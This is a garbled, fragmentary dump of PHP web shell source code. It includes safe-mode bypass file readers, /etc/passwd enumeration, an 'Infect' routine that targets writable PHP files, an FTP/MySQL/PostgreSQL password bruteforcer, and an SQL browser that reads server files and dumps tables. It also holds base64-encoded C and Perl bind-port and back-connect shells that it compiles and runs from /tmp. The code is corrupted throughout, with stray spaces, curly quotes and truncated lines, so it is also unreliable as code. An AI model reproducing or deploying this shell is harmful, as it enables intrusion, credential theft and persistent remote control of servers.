<input type = hidden name = charset value = ‘”. (isset ($ _ POST [‘ charset ‘])? $ _ POST [‘ charset ‘]:’ ‘).”‘>
<label> <select name = ‘p1’> “;
if (! empty ($ _COOKIE [‘act’]) && @count ($ _ COOKIE [‘f’]))
echo “<option value = ‘paste’>? Paste </ option> “;
echo” <option value = ‘copy’> Copy </ option> <option value = ‘move’> Move </ option> <option value = ‘delete’> Delete </ option> “;
if (class_exists (‘ZipArchive’))
echo “<

if (! empty ($ _ COOKIE [‘act’]) && @count ($ _ COOKIE [‘f’]) && (($ _COOKIE [‘act’] == ‘zip’) || ($ _COOKIE [‘act’ ] == ‘tar’)))
echo “& nbsp; file name: <input type = text name = p2 value = ‘hard_”. date (“Ymd_His”). “.” . ($ _COOKIE [‘act’] == ‘zip’? ‘Zip’: ‘tar.gz’). “‘> & nbsp;”;
echo “<input type = ‘submit’ value = ‘submit’> </ td> </ tr> </ form> </ table> </ div>”;
hardFooter ();
}
function actionStringTools () {
if (! function_exists (‘hex2bin’)) {function hex2bin ($ p) {return decbin (hexdec ($ p));}}
if (! function_exists (‘binhex’

if (! function_exists (‘ascii2hex’)) {function ascii2hex ($ p) {$ r = ”; for ($ i = 0; $ i <strlen ($ p); ++ $ i) $ r. = sprintf (‘% 02X’, ord ($ p [$ i])); return strtoupper ($ r);}}
if (! Function_exists (‘full_urlencode’)) {function full_urlencode ($ p) {$ r = ”; for ($ i = 0; $ i <strlen ($ p); ++ $ i) $ r. = ‘%’. dechex (ord ($ p [$ i])); return strtoupper ($ r);} }
$ stringTools = array (
‘Base64 encode’ => ‘base64_encode’,
‘Base64 decode’ => ‘base64_decode’,
‘Url encode’ => ‘urlencode’,
‘Url decode’ => ‘urldecode’,
‘Full urlencode’ => ‘full_urlencode’,
‘md5 hash’ => ‘md5’,
‘sha1 hash’ => ‘sha1’,
‘crypt’ => ‘crypt’,
‘CRC32’ => ‘crc32’,
‘ASCII to HEX’ => ‘ascii2hex’,
‘HEX to ASCII’ => ‘hex2ascii’,
‘HEX to DEC’ => ‘hexdec’,
‘HEX to BIN’ => ‘hex2bin’,
‘DEC to HEX’ => ‘dechex’,
‘DEC to BIN’ => ‘decbin’,
‘BIN to HEX’ = > ‘binhex’,
‘BIN to DEC’ => ‘bindec’,
‘String to lower case’ => ‘strtolower’,
‘String to upper case’ => ‘strtoupper’,
‘Htmlspecialchars’ =>’ htmlspecialchars’,
‘ String length ‘=>’ strlen ‘,
);
if (isset ($ _ POST [‘ajax’])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, true);
ob_start ();
if (in_array ($ _ POST [‘p1’],

$ temp = “document.getElementById (‘strOutput’). style.display = ”; document.getElementById (‘strOutput’). innerHTML = ‘”. addcslashes (htmlspecialchars (ob_get_clean ()), “\ n \ r \ t \\ ‘\ 0 “).”‘; \ N “;
echo strlen ($ temp), “\ n”, $ temp;
exit;
}
if (empty ($ _ POST [‘ajax’]) &&! empty ($ _ POST [‘p1’]))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, 0);
hardHeader ();
echo ‘<h1> String conversions </ h1> <div class = content>’;
echo “<form name = ‘toolsForm’ onSubmit = ‘if (this.ajax.checked) {a (null, null, this.selectTool.value, this.input.value);} else {g (null, null, this .selectTool.value, this.input.value);} return false; ‘> <

echo “<option value = ‘”. htmlspecialchars ($ v). “‘>”. $ k. “</ option>”;
echo “</ select> </ label> <input type = ‘submit’ value = ‘submit’ /> <input type = checkbox name = ajax value = 1″. (@ $ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’ ]). ‘ajax’]? ‘checked’: ”). “> send using AJAX <br> <textarea name = ‘input’ style = ‘margin-top: 5px’ class = bigarea>”. (empty ($ _POST [‘p1’])? ”: Htmlspecialchars (@ $ _ POST [‘p2’])). “” </ Textarea> </ form> <pre class = ‘ml1’ style = ‘”. (Empty ($ _ POST [‘p1’])? ‘display: none;’: ”). “margin-top: 5px ‘id =’ strOutput ‘>”;
if (! empty ($ _ POST [‘p1’
])) { if (in_array ($ _ POST [‘p1’], $ stringTools)) echo htmlspecialchars ($ _ POST [‘p1’] ($ _ POST [‘p2’]));
}
echo “</ pre> </ div> <br> <h1> Search files: </ h1> <div class = content>
<form onsubmit = \ “g (null, this.cwd.value, null, this.text.value, this.filename.value); return false; \”> <table cellpadding = ‘1’ cellspacing = ‘0’ width = ‘50% ‘>
<tr> <td width =’ 1% ‘> Text: </ td> <td> <input type =’ text ‘name =’ text ‘style =’ width: 100% ‘> </ td> </ tr>
<tr> <td> Path: </ td> <td> <input type = ‘text’ name = ‘cwd’ value = ‘”. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).” ‘style =’ width: 100% ‘> </ td> </ tr>
<tr> <td> Name: </ td> <td> <input type =’ text ‘name =’ filename ‘value =’ * ‘ style = ‘width: 100%’> </ td> </ tr>
<tr> <td> </ td> <td> <input type = ‘submit’ value = ‘submit’> </ td> </ tr>
</ table> </ form> “;
function hardRecursiveGlob ($ path) {
if (substr ($ path, -1)! = ‘ / ‘)
$ path. =’ / ‘;
$ paths = @array_unique (@array_merge (@glob ($ path. $ _ POST [‘p3’]), @glob ($ path. ‘*’, GLOB_ONLYDIR)));
if (is_array ($ paths) && @ count ($ paths)) {
foreach ($ paths as $?) {
if (@is_dir ($?)) {
if ($ path! = $?)
hardRecursiveGlob ($?);
} else {
if (empty ($ _ POST [‘p2’])) || @strpos (file_get_contents ($?), $ _POST [‘p2’])! == false)
echo “<a href = ‘#’ onclick = ‘g (\ “FilesTools \”, null, \ “”. urlencode ($?). “\”, \ “view \”, \ “\”)’> “. htmlspecialchars ($?).” </ a > <br> “;
}
}
}
}
if (@ $ _ POST [‘p3’])
hardRecursiveGlob ($ _ POST [‘c’]);
echo “<

<input type = ‘text’ name = ‘hash’ style = ‘width: 200px;’> <br>
<input type = ‘hidden’ name = ‘act’ value = ‘find’ />
<input type = ‘submit’ value = ‘hashcracking.ru’ onclick = \ “document.hf.action = ‘https: //hashcracking.ru/index.php’; document.hf.submit () \”> <br>
<input type = ‘submit ‘value =’ md5.rednoize.com ‘onclick = \ “document.hf.action =’ http: //md5.rednoize.com/? q = ‘+ document.hf.hash.value +’ & s = md5 ‘; document .hf.submit () \ “> <br>
<input type = ‘submit’ value = ‘fakenamegenerator.com’ onclick = \” document.hf.action = ‘http: //www.fakenamegenerator.com/’; document .hf.submit () \ “> <br>
<input type = ‘submit ‘value =’ hashcrack.com ‘onclick = \ “document.hf.action =’ http: //www.hashcrack.com/index.php ‘; document.hf.submit () \”> <br>
if (@copy (“compress.zlib: //”. $ _ POST [‘p2’], $ temp)) { echo @file_get_contents ($ temp); unlink ($ temp); } else

echo ‘Sorry … Can \’ t open file ‘;
break;
case 2:
$ files = glob ($ _ POST [‘p2’]. ‘*’);
if (is_array ($ files))
foreach ($ files as $ filename)
echo $ filename. “\ n”;
break;
case 3:
$ ch = curl_init (“file: //”. $ _ POST [‘p2’]. “\ x00” .SELF_PATH);
curl_exec ($ ch);
break;
case 4:
ini_restore (“safe_mode”);
ini_restore (“open_basedir”);
include ($ _ POST [‘p2’]);
break;
case 5:
for (; $ _ POST [‘p2’] <= $ _ POST [‘p3’]; $ _ POST [‘p2’] ++) {
$ uid = @posix_getpwuid ($ _ POST [‘p2’]);
if ($ uid)
echo join (‘:’, $ uid). “\ n”;
}
break;
case 6:
if (! function_exists (‘imap_open’)) break;
$ stream = imap_open ($ _ POST [‘p2’], “”, “”);
if ($ stream == FALSE)
break;
echo imap_body ($ stream, 1);
imap_close ($ stream);
break;
}
$ temp = ob_get_clean ();
hardHeader ();
echo ‘<h1> Safe mode bypass </ h1> <div class = content>’;
echo ‘<span> Copy (read file) </ span> <form onsubmit = \’ g (null, null, “1”, this.param.value); return false; \ ‘> <input class = “toolsInp” type = text name = param> <input type = submit value = “submit”> </ form> <br> <span> Glob (list dir) </ span> <form onsubmit = \ ‘g (null, null, ” 2 “, this.param.value); return false; \ ‘> <input class =” toolsInp “type = text name = param> <input type = submit value =” submit “> </ form> <br> <span > Curl (read file) </ span> <form onsubmit = \ ‘g (null, null, “3”, this.param.value); return false; \’> <input class = “toolsInp” type = text name = param> <input type = submit value = “submit”> </ form> <br> <span> Ini_restore (read file) </ span> <form onsubmit = \ ‘g (null, null, “4”, this.param.value); return false; \’> <input class = “toolsInp” type = text name = param> <input type = submit value = ” submit “> </ form> <br> <span> Posix_getpwuid (” Read “/ etc / passwd) </ span> <table> <form onsubmit = \ ‘g (null, null,” 5 “, this.param1. value, this.param2.value); return false; \ ‘> <tr> <td> From </ td> <td> <input type = text name = param1 value = 0> </ td> </ tr> < tr> <td> To </ td> <td> <input type = text name = param2 value = 1000> </ td> </ tr> </ table> <input type = submit value = “submit”> </ form> <br> <br> <span> Imap_open (read file) </ span> <form onsubmit = \ ‘g (null, null, “6”, this.param.value); return false;\ ‘> <input type = text name = param> <input type = submit value = “submit”> </ form>’;
if ($ temp)
echo ‘<pre class = “ml1” style = “margin-top: 5px” id = “Output”>’. $ temp. ‘</ pre>’;
echo ‘</ div>’;
hardFooter ();
}
function actionLogout () {
setcookie (md5 ($ _ SERVER [‘HTTP_HOST’]), ”, time () – 3600);
die (‘bye!’);
}
function actionSelfRemove () {
if ($ _ POST [‘p1’] == ‘yes’)
if (@unlink (preg_replace (‘! \ (\ d + \) \ s. *!’, ”, __FILE__)))
die (‘Shell has been removed’);
else
echo ‘unlink error!’;
if ($ _ POST [‘p1’]! = ‘yes’)
hardHeader ();
echo ‘<h1> Suicide </ h1> < div class = content> Really want to remove the shell? <br> <a href=# onclick=”g(null,null,\’yes\’)”> Yes </a> </ div> ‘;
hardFooter ();
}
function actionInfect () {
hardHeader ();
echo ‘<h1> Infect </ h1> <div class = content>’;
if ($ _ POST [‘p1’] == ‘infect’) {
$ target = $ _ SERVER [‘DOCUMENT_ROOT’];
function ListFiles ($ dir) {
if ($ dh = opendir ($ dir)) {
$ files = Array ();
$ inner_files = Array ();
while ($ file = readdir ($ dh)) {
if ($ file! = “.” && $ file! = “..”) {
if (is_dir ($ dir. “/”. $ file)) {
$ inner_files = ListFiles ($ dir. “/”. $ File);
if (is_array ($ inner_files)) $ files = array_merge ($ files, $ inner_files);
} else {
array_push ($ files, $ dir. “/”. $ file);
}
}
}
closedir ($ dh);
return $ files;
}
}
foreach (ListFiles ($ target) as $ key => $ file) {
$ nFile = substr ($ file, -4, 4);
if ($ nFile == “.php”) {
if (($ file <> $ _ SERVER [‘DOCUMENT_ROOT’]. $ _ SERVER [‘PHP_SELF’]) && (is_writeable ($ file))) {
echo “$ file < br> “;
$ i ++;
}
}
}
echo “<font color = red size = 14> $ i </ font>”;
} else {
echo “<form method = post> <input type = submit value = Infect name = infet> </ form>”;
echo ‘Really want to infect the server? & nbsp; <a href=# onclick=”g(null,null,\’infect\’)”> Yes </a> </ div>’;
}
hardFooter ();
}
function actionBruteforce () {
hardHeader ();
if (isset ($ _ POST [‘proto’])) {
echo ‘<h1> Results </ h1> <div class = content> <span> Type: </ span>’ .htmlspecialchars ($ _ POST [‘proto’]). ‘ <span> Server: </ span> ‘.htmlspecialchars ($ _ POST [‘ server ‘]).’ <br> ‘;
if ($ _POST [‘proto’] == ‘ftp’) {
function bruteForce ($ ip, $ port, $ login, $ pass) {
$ fp = @ ftp_connect ($ ip, $ port? $ port: 21);
if (! $ fp) return false;
$ res = @ftp_login ($ fp, $ login, $ pass);
@ftp_close ($ fp);
return $ res;
}
} elseif ($ _POST [‘proto’] == ‘mysql’) {
function bruteForce ($ ip, $ port, $ login, $ pass) {
$ res = @mysql_connect ($ ip. ‘:’. ($ port ? $ port: 3306), $ login, $ pass);
@mysql_close ($ res);
return $ res;

function bruteForce ($ ip, $ port, $ login, $ pass) {
$ str = “host = ‘”. $ ip. “‘ port = ‘”. $ port. “‘ user = ‘”. $ login. “‘ password = ‘”. $ pass.”‘ dbname = postgres “;
$ res = @pg_connect ($ str);
@pg_close ($ res);
return $ res;
}
}
$ success = 0;
$ attempts = 0;
$ server = explode (“:”, $ _POST [‘server’]);
if ($ _ POST [‘type’] == 1) {
$ temp = @file (‘/ etc / passwd’);
if (is_array ($ temp))
foreach ($ temp as $ line) {
$ line = explode (“:”, $ line);
++ $ attempts;
if (bruteForce (@ $ server [0], @ $ server [1], $ line [0], $ line [0])) {
$ success ++;
echo ‘<b>’. htmlspecialchars ($ line [0]). ‘</ b>:’. htmlspecialchars ($ line [0]). ‘<br>’;
}
if (@ $ _ POST [‘reverse’]) {
$ tmp = “”;
for ($ i = strlen ($ line [0]) – 1; $ i> = 0; – $ i)
$ tmp. = $ line [0] [$ i];
++ $ attempts;
if (bruteForce (@ $ server [0], @ $ server [1], $ line [0], $ tmp)) {
$ success ++;
echo ‘<b>’. htmlspecialchars ($ line [0]). ‘</ b>:’. htmlspecialchars ($ tmp);
}
}
}
} elseif ($ _ POST [‘type’] == 2) {
$ temp = @file ($ _ POST [‘dict’]);
if (is_array ($ temp))
foreach ($ temp as $ line) {
$ line = trim ($ line);
++ $ attempts;
if (bruteForce ($ server [0], @ $ server [1], $ _POST [‘login’], $ line)) {
$ success ++;
echo ‘<b>’. htmlspecialchars ($ _ POST [‘
}
}
}
echo “<span> Attempts: </ span> $ attempts <span> Success: </ span> $ success </ div> <br>”;
}
echo ‘<h1> FTP bruteforce </ h1> <div class = content> <table> <form method = post> <tr> <td> <span> Type </ span> </ td>’
. ‘<td > <label> <select name = proto> <option value = ftp> FTP </ option> <option value = mysql> MySql </ option> <option value = pgsql> PostgreSql </ option> </ select> </ label > </ td> </ tr> <tr> <td> ‘
.’ <input type = hidden name = c value = “‘. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).'”> ‘
.’ <input type = hidden name = a value = “‘.

. ‘<td> <input type = text name = server value = “127.0.0.1”> </ td> </ tr>’
. ‘<tr> <td> <span> Brute type </ span> </ td > ‘
.’ <td> <input type = radio name = type value = “1” checked> / etc / passwd </ td> </ tr> ‘
.’ <tr> <td> </ td> <td style = “padding-left: 15px”> <input type = checkbox name = reverse value = 1 checked> reverse (login -> nigol) </ td> </ tr> ‘
.’ <tr> <td> </ td> <td> <input type = radio name = type value = “2”> Dictionary </ td> </ tr> ‘
.’ <tr> <td> </ td> <td> <table style = “padding-left : 15px “> <tr> <td> <span> Login </ span> </ td> ‘
.’ <td> <input type = text name = login value = “root”> </ td> </ tr> ‘
.’ <tr> <td> <span> Dictionary </ span> </ td> ‘
.’ <td> <input type = text name = dict value = “‘. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).’ passwd.dic”> </ td> </ tr> </ table> ‘
. ‘</ td> </ tr> <tr> <td> </ td> <td> <input type = submit value = “submit”> </ td> </ tr> </ form> </ table> ‘;
echo ‘</ div>’;
hardFooter ();
}
function actionSql () {
class DbClass {
var $ type;
var $ link;
var $ res;
function DbClass ($ type) {
$ this-> type = $ type;
}
function connect ($ host, $ user, $ pass, $ dbname) {
switch ($ this-> type) {
case ‘mysql’:
if ($ this-> link = @mysql_connect ($ host, $ user, $ pass , true)) return true;
break;
case ‘pgsql’:
$ host = explode (‘:’, $ host);
if (! $ host [1]) $ host [1] = 5432;
if ($ this-> link = @pg_connect (“host = {$ host [0]} port = {$ host [1]} user = $ user password = $ pass dbname = $ dbname”)) return true;
break;
}
return false;
}
function selectdb ($ db) {
switch ($ this-> type) {
case ‘mysql’:
if (@mysql_select_db ($ db)) return true;
break;
}
return false;
}
function function ($ str) {
switch ($ this-> type) {
case ‘mysql’:
return $ this-> res = @mysql_query ($ str);
break;
case ‘pgsql’:
return $ this-> res = @pg_query ($ this-> link, $ str);
break;
}
return false;
}
function fetch () {
$ res = func_num_args ()? func_get_arg (0): $ this-> res;
switch ($ this-> type) {
case ‘mysql’:
return @mysql_fetch_assoc ($ res);
break;
case ‘pgsql’:
return @pg_fetch_assoc ($ res);
break;
}
return false;
}
function listDbs () {
switch ($ this-> type) {
case ‘mysql’:
return $ this-> query (“SHOW databases”);
break;
case ‘pgsql’:
return $ this-> res = $ this-> query (“SELECT datname FROM pg_database WHERE datistemplate! = ‘t'”);
break;
}
return false;
}
function listTables () {
switch ($ this->

return $ this-> res = $ this-> query (‘SHOW TABLES’);
break;
case ‘pgsql’:
return $ this-> res = $ this-> query (“select table_name from information_schema.tables where table_schema! = ‘information_schema’ AND table_schema! = ‘pg_catalog'”);
break;
}
return false;
}
function error () {
switch ($ this-> type) {
case ‘mysql’:
return @mysql_error ();
break;
case ‘pgsql’:
return @pg_last_error ();
break;
}
return false;
}
function setCharset ($ str) {
switch ($ this-> type) {
case ‘mysql’:

return @mysql_set_charset ($ str, $ this-> link);
else
$ this-> query (‘SET CHARSET’. $ str);
break;
case ‘pgsql’:
return @pg_set_client_encoding ($ this-> link, $ str);
break;
}
return false;
}
function loadFile ($ str) {
switch ($ this-> type) {
case ‘mysql’:
return $ this-> fetch ($ this-> query (“SELECT LOAD_FILE (‘”. addslashes ($ str). “‘ ) as file “));
break;
case ‘pgsql’:
$ this-> query (“CREATE TABLE hard2 (file text); COPY hard2 FROM ‘” .addslashes ($ str). “‘; select file from hard2;”);
$ r = array ();
while ($ i = $ this->
fetch ()) $ r [] = $ i [‘file’];
$ this-> query (‘drop table hard2’);
return array (‘file’ => implode (“\ n”, $ r));
break;
}
return false;
}
function dump ($ table, $ fp = false) {
switch ($ this-> type) {
case ‘mysql’:
$ res = $ this-> query (‘SHOW CREATE TABLE `’. $ table.’` ‘) ;
$ create = mysql_fetch_array ($ res);
$ sql = $ create [1]. “; \ n”;
if ($ fp) fwrite ($ fp, $ sql); else echo ($ sql);
$ this-> query (‘SELECT * FROM `’. $ table.’` ‘);
$ i = 0;
$ head = true;
while ($? = $ this-> fetch ()) {
$ sql = ”;
if ($ i% 1000 == 0) {
$ head = true;
$ sql = “; \ n \ n”;
}
$ columns = array ();

$? [$ k] = “NULL”;
elseif (is_int ($ v))
$? [$ k] = $ v;
else
$? [$ k] = “‘”. @ mysql_real_escape_string ($ v). “‘”;
$ columns [] = “` “. $ k.” “”;
}
if ($ head) {
$ sql. = ‘INSERT INTO `’. $ table.’` (‘.implode (“, “, $ columns).”) VALUES \ n \ t (“. implode (“, ” , $?). ‘)’;
$ head = false;
} else
$ sql. = “\ n \ t, (“. implode (“,”, $?). ‘)’;
if ($ fp) fwrite ($ fp, $ sql); else echo ($ sql);
$ i ++;
}
if (! $ head)
if ($ fp) fwrite ($ fp, “; \ n \ n”); else echo (“; \ n \ n”);
break;
case ‘pgsql’:
$ this-> query (‘SELECT * FROM’. $ table);
while ($? = $ this-> fetch ()) {
$ columns = array ();
foreach ($? as $ k => $ v) {
$? [$ k] = “‘” .addslashes ($ v). “‘”;
$ columns [] = $ k;
}
$ sql = ‘INSERT INTO’. $ table. ‘ (‘.implode (“,”, $ columns).’) VALUES (‘.implode (“,”, $?).’); ‘. “\ n”;
if ($ fp) fwrite ($ fp, $ sql); else echo ($ sql);
}
break;
}
return false;
}
};
$ db = new DbClass ($ _ POST [‘type’]);
if ((@ @ _ POST [‘p2’] == ‘download’) && (@ $ _ POST [‘p1’]! = ‘select’)) {
$ db-> connect ($ _ POST [‘sql_host’], $ _POST [‘sql_login’], $ _POST [‘sql_pass’], $ _POST [‘sql_base’]);
$ db-> selectdb ($ _ POST [‘sql_base’]);
switch ($ _ POST [‘charset’]) {
case “Windows-1251”: $ db-> setCharset (‘cp1251’); break;
case “UTF-8”: $ db-> setCharset (‘utf8’); break;
case “KOI8-R”: $ db-> setCharset (‘koi8r’); break;
case “KOI8-U”: $ db-> setCharset (‘koi8u’); break;
case “cp866”: $ db-> setCharset (‘cp866’); break;
}
if (empty ($ _ POST [‘file’]))) {
ob_start (“ob_gzhandler”, 4096);
header (“Content-Disposition: attachment; filename = dump.sql”);
header (“Content-Type: text / plain”);
foreach ($ _ POST [‘tbl’] as $ v)
$ db-> dump ($ v);
exit;
} elseif ($ fp = @fopen ($ _ POST [‘file’], ‘w’)) {
foreach ($ _ POST [‘tbl’] as $ v)
$ db-> dump ($ v, $ fp);
fclose ($ fp);
unset ($ _ POST [‘p2’]);
} else
die (‘<script> alert (“Error! Can \’ t open file”); window.history.back (-1) </ script> ‘);
}
hardHeader ();
echo ”
<h1> Sql browser </ h1> <div class = content>
<form name = ‘sf’ method = ‘post’ onsubmit = ‘fs (this);’> <table cellpadding = ‘2’ cellspacing = ‘0 ‘> <tr>
<td> Type </ td> <td> Host </ td> <td> Login </ td> <td> Password </ td> <td> Database </ td> <td> </ td> </ tr> <tr>
<input type = hidden name = ne value = ”> <input type = hidden name = a value = Sql> <input type = hidden name = p1 value = ‘query’> <input type = hidden name = p2 value = ”> <input type = hidden name = c value = ‘

if (@ $ _ POST [‘type’] == ‘mysql’) echo ‘selected’;
echo “> MySql </ option> <option value = ‘pgsql'”;
if (@ $ _ POST [‘type’] == ‘pgsql’) echo ‘selected’;
echo “> PostgreSql </ option> </ select> </ label> </ td>
<td> <input type = text name = sql_host value = \” “. (empty ($ _ POST [‘sql_host’])? ‘ localhost ‘: htmlspecialchars ($ _ POST [‘ sql_host ‘])). “\”> </ td>
<td> <input type = text name = sql_login value = \ “”. (empty ($ _ POST [‘ sql_login ‘] )? ‘root’: htmlspecialchars ($ _ POST [‘sql_login’])). “\”> </ td>
<td> <input type = text name = sql_pass value = \ “”. (empty ($ _ POST [‘ sql_pass’

if ($ db-> connect ($ _ POST [‘sql_host’], $ _POST [‘sql_login’], $ _POST [‘sql_pass’], $ _POST [‘sql_base’])) {
switch ($ _ POST [‘charset’ ]) {
case “Windows-1251”: $ db-> setCharset (‘cp1251’); break;
case “UTF-8”: $ db-> setCharset (‘utf8’); break;
case “KOI8-R”: $ db-> setCharset (‘koi8r’); break;
case “KOI8-U”: $ db-> setCharset (‘koi8u’); break;
case “cp866”: $ db-> setCharset (‘cp866’); break;
}
$ db-> listDbs ();
echo “<label> <select name = sql_base> <option value = ”> </ option>”;
while ($? = $ db-> fetch ()) {
list ($ key, $ value) = each ($?);
echo ‘<option value = “‘. $ value. ‘”‘. ($ value == $ _ POST [‘sql_base’]? ‘selected’: ”). ‘>’. $ value. ‘</ option>’ ;
}
echo ‘</ select> </ label>’;
}
else echo $ tmp;
} else
echo $ tmp;
echo “</ td>
<td> <input type = submit value = ‘submit’ onclick = ‘fs (d.sf);’> </ td>
<td> <input type = checkbox name = sql_count value = ‘on ‘” (empty ($ _ POST [‘sql_count’])? ”: ‘checked’). “> count the number of rows </ td>
</ tr>
</ table>
<script>
s_db = ‘”. @ addslashes ($ _ POST [‘ sql_base ‘]). “‘;
function fs (f) {
if ( f.sql_base.value! = s_db) {f.onsubmit = function () {};
if (f.p1) f.p1.value = ”;
if (f.p2) f.p2.value = ”;
if (f.p3) f.p3.value = ”;
}
}
function st (t, l) {
d.sf.p1.value = ‘select’;
d.sf.p2.value = t;
if (l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit ();
}
function is () {
for (i = 0; i <d.sf.elements [‘tbl []’]. length; ++ i)
d.sf.elements [‘tbl []’] [i] .checked =! d.sf.elements [‘tbl []’] [i] .checked;
}
</ script> “;
if (isset ($ db) && $ db-> link) {
echo” <br/> <table width = 100% cellpadding = 2 cellspacing = 0> “;
if (! empty ($ _ POST [‘sql_base’])) {
$ db-> selectdb ($ _ POST [‘sql_base’]);
echo “<tr> <td width = 1 style = ‘border-top: 2px solid # 666;’> <span> Tables: </ span> <br> <br> “;
$ tbls_res = $ db-> listTables ();
while ($? = $ Db->
fetch ($ tbls_res)) { list ($ key, $ value) = each ($?);
if (! empty ($ _ POST [‘sql_count’]))
$ n = $ db-> fetch ($ db-> query (‘SELECT COUNT (*) as n FROM’. $ value. ”));
$ value = htmlspecialchars ($ value);
echo “<nobr> <input type = ‘checkbox’ name = ‘tbl []’ value = ‘”. $ value. “‘> & nbsp; <a href = # onclick = \” st (‘”. $ value.” ‘, 1) \ “>”. $ Value. “</a>”. (empty ($ _ POST [‘sql_count’])? ‘& nbsp;’: “<small> ({$ n [‘n’]}) </ small>”). “</ nobr> <br>”;
}
echo “<input type = ‘checkbox’ onclick = ‘is ();’> <input type = submit value = ‘Dump’ onclick = ‘document.sf.p2.value = \” download \ “; document.sf. submit (); ‘> <br> File path: <input type = text name = file value =’ dump.sql ‘

$ num = $ db-> fetch ();
$ pages = ceil ($ num [‘n’] / 30);
echo “<script> d.sf.onsubmit = function () {st (\” “. $ _POST [‘p2’].” \ “, d.sf.p3.value)} </ script> <span>” . $ _ POST [‘p2’]. “” </ Span> ({$ num [‘n’]} records) Page # <input type = text name = ‘p3’ value = “. ((int) $ _ POST [‘p3’]). “>”;
echo “of $ pages”;
if ($ _ POST [‘p3’]> 1)
echo “<a href = # onclick = ‘st (\” “. $ _POST [‘ p2 ‘].'”, ‘. ($ _POST [‘ p3 ‘] – 1). “) ‘> & Lt; Prev </a>”;
if ($ _ POST [‘p3’] <$ pages)
echo “<a href = # onclick = ‘st (\” “. $ _POST [‘ p2 ‘].'”, ($ _POST [‘p3’] + 1). “) ‘> Next & gt; </a>”;
$ _POST [‘p3’] -;
if ($ _ POST [‘type’] == ‘pgsql’)
$ _POST [‘p2’] = ‘SELECT * FROM’. $ _ POST [‘p2’]. ‘ LIMIT 30 OFFSET ‘. ($ _ POST [‘ p3 ‘] * 30);
else
$ _POST [‘p2’] = ‘SELECT * FROM `’. $ _ POST [‘p2’]. ” LIMIT ‘. ($ _ POST [‘ p3 ‘] * 30).’, 30 ‘;
echo “<br> <br>”;
}
if ((@ @ _ POST [‘p1’] == ‘query’) &&! empty ($ _ POST [‘p2’])) {
$ db-> query (@ $ _ POST [‘p2’]);
if ($ db-> res! == false) {
$ title = false;
echo ‘<table width = 100% cellspacing = 1 cellpadding = 2 class = main>’;
$ line = 1;
while ($? = $ db-> fetch ()) {
if (! $ title) {
echo ‘<tr>’;
foreach ($? as $ key => $ value)
echo ‘<th>’. $ key. ‘</ th>’;
reset ($?);
$ title = true;
echo ‘</ tr> <tr>’;
$ line = 2;
}
echo ‘<tr class = “l’. $ line. ‘”>’;
$ line = $ line == 1? 2: 1;
foreach ($? as $ key => $ value) {
if ($ value == null)
echo ‘<td> <i> null </ i> </ td>’;
else
echo ‘<td>’. nl2br (htmlspecialchars ($ value)). ‘</ td>’;
}
echo ‘</ tr>’;
}
echo ‘</ table>’;
} else {
echo ‘<div> <b> Error: </ b>’ .htmlspecialchars ($ db-> error ()). ‘</ div>’;
}
}
echo “<br> </ form> <form onsubmit = ‘d.sf.p1.value = \” query \ “; d.sf.p2.value = this.query.value; document.sf.submit ( ); return false; ‘> <textarea name =’ query ‘style =’ width: 100%; height: 100px ‘> “;
if (! empty ($ _ POST [‘p2’])) &
& ($ _POST [‘p1’]! = ‘Loadfile’)) echo htmlspecialchars ($ _ POST [‘p2’]);
echo “</ textarea> <br/> <input type = submit value = ‘Execute’>”;
echo “</ td> </ tr>”;
}
echo “</ table> </ form> <br/>”;
if ($ _ POST [‘type’] == ‘mysql’) {
$ db-> query (“SELECT 1 FROM mysql.user WHERE concat (` user`, ‘@’, `host`) = USER () AND` File_priv` = ‘y’ “);
if ($ db-> fetch ())
echo “<form onsubmit = ‘d.sf.p1.value = \” loadfile \ “; document.sf.p2.value = this.f.value; document.sf.submit (); return false; ‘> <span> Load file </ span> <input class =’ ​​toolsInp ‘type = text name = f> <input type = submit value =’ submit ‘> </ form> “;
}
if (@ $ _ POST [‘p1’] == ‘loadfile’) {
$ file = $ db-> loadFile ($ _ POST [‘p2’]);
echo ‘<br/> <pre class = ml1> ‘. htmlspecialchars ($ file [‘ file ‘]).’ </ pre> ‘;
}
} else {
echo htmlspecialchars ($ db-> error ());
}
echo ‘</ div>’;
hardFooter ();
}
function actionNetwork () {
hardHeader ();
$ back_connect_c = “I2luY2x1ZGUgPHN0ZGlvLmg + DQojaW”;
$ back_connect_p = “IyEvdXNyL”;
$ bind_port_c = “I2luY2x1ZGUgPHN0ZGlvLmg + DQojaW5jbHVkZSA8c3RyaW5nLmg + DQojaW5jbHVkZSA8dW5pc3RkLmg + DQojaWKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9 “;
$ bind_port_p = “IyEvdXNyL + JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0 =”;
echo “<h1> Network tools </ h1>
<form name = ‘nfp’ onSubmit = ‘g (null, null, this.using.value, this.port.value, this.pass.value); return false;’>
<span> Bind port to / bin / sh </ span> <br/>
Port: <input type = ‘text’ name = ‘port’ value = ‘31337’> Password: <input type = ‘text’ name = ‘pass’> Using: <label> <select name = ‘using’> <option value = ‘bpc’> C </ option> <option value = ‘bpp’> Perl </ option> </ select> </ label> <input type = submit value = ‘submit’ >
</ form>
<form name = ‘nfp’ onSubmit = ‘g (null, null, this.using.value, this.server.value, this.port.value); return false;’>
<span> Back- connect to </ span> <br/>
} } if ($ _ POST [‘p1’] == ‘bpc’) { cf (“/ tmp / bp.c”, $ bind_port_c); $? = ex (“gcc -o / tmp / bp /tmp/bp.c”); @unlink (“/ tmp / bp.c”);

$? . = ex (“/ tmp / bp”. $ _ POST [‘p2’]. “”. $ _ POST [‘p3’]. “&”);
